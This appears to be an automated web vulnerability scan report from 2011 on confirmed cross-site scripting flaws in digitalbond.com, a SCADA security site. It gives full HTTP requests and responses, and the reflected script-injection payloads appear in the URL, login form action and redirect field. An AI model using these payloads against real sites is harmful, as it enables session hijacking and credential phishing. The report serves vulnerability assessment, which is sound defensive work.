XSS, DORK, digitalbond.com REPORT SUMMARYLoading
Netsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
20
identified
14
confirmed
0
critical
5
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
IMPORTANT
50 %
MEDIUM
5 %
LOW
20 %
INFORMATION
25 %
|
|
Cross-site Scripting
Cross-site Scripting
8
TOTAL
IMPORTANT
CONFIRMED
8
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /wp-includes/js/l10n.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040A)%3C/script%3E
/wp-includes/js/l10n.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040A)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| ver | GET | 20101110 |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x00040A)</script> |
Request
GET /wp-includes/js/l10n.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00040A)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:32 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes Js L10n Js'"-->< Style>< Script><script>netsparker(0x00040A)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=3" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/svx1C8_728x90.jpg" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js\'\"--></style></script><script>netsparker(0x00040A)</script>/?_login=63a7e0feef"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js\'\"--></style></script><script>netsparker(0x00040A)</script>/?_login=be3a96e837" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that d..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:32 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11354
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes Js L10n Js'"-->< Style>< Script><script>netsparker(0x00040A)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=3" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/svx1C8_728x90.jpg" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js\'\"--></style></script><script>netsparker(0x00040A)</script>/?_login=63a7e0feef"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js\'\"--></style></script><script>netsparker(0x00040A)</script>/?_login=be3a96e837" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that d..
|
- /wp-includes/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E
/wp-includes/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000439)</script> |
Request
GET /wp-includes/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000439)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110
